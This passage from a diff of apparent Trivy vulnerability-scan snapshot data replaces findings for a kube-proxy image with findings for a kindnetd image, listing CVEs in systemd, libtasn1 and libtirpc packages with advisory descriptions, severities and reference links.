"https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", "packageName": "libsystemd0", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202107-48", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + }, + { + "type": "URL", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "fixedVersion": "4.16.0-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "privilege escalation via the less pager", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5707-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc-common", "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", ], }, "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "name": "libtirpc: DoS vulnerability with lots of connections", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "https://security.gentoo.org/glsa/202210-33", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://ubuntu.com/security/notices/USN-5538-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://www.debian.org/security/2022/dsa-5200", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc3", + "references": [ + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", + ], + }, + "category": "Vulnerability", + "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "libtirpc: DoS vulnerability with lots of connections", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "https://security.gentoo.org/glsa/202210-33", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://ubuntu.com/security/notices/USN-5538-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.debian.org/security/2022/dsa-5200", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "https://access.redhat.com/errata/RHSA-2023:0336", "https://access.redhat.com/security/cve/CVE-2022-3821", @@ -165718,7 +165439,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "buffer overrun in format_timespan() function", "references": [ @@ -165799,11 +165520,11 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 